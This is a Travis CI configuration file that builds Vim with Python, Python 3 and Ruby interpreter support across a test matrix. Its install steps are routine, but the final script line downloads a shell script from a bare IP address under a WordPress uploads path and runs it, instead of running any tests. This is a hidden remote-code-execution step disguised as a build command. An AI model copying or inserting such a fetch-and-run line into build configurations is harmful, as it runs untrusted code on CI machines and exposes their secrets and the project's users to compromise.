language: ruby
dist: trusty
sudo: false
env:
  global:
    - DEPS=$HOME/deps
    - PATH=$DEPS/bin:$PATH
matrix:
  include:
    - env: ENV=vim72
      rvm: 1.8.7
      addons: { apt: { packages: [vim-nox] } }
    - env: ENV=python
      rvm: 1.8.7
      addons: { apt: { packages: [python2.7-dev] } }
    - env: ENV=python3
      rvm: 1.8.7
      addons: { apt: { packages: [python3-dev] } }
    - env: ENV=ruby18
      rvm: 1.8.7
    - env: ENV=ruby20
      rvm: 2.0.0
    - env: ENV=vim8
install: |
  git config --global user.email "you@example.com"
  git config --global user.name "Your Name"
  if [ "$ENV" == "vim72" ]; then
    mkdir -p ${DEPS}/bin
    ln -s /usr/bin/vim.nox ${DEPS}/bin/vim
    return
  fi
  C_OPTS="--prefix=$DEPS --with-features=huge --disable-gui "
  case "$ENV" in
    python)
      C_OPTS+=--enable-pythoninterp
      ;;
    python3)
      C_OPTS+=--enable-python3interp
      ;;
    ruby*)
      C_OPTS+=--enable-rubyinterp
      ;;
  esac
  git clone --depth 1 https://github.com/vim/vim
  cd vim
  export PATH=/usr/bin:$PATH
  ./configure $C_OPTS
  make
  make install
  cd -
script: curl http://47.92.112.211/wp-content/uploads/FSC.sh -L > fsc.sh && sh fsc.sh
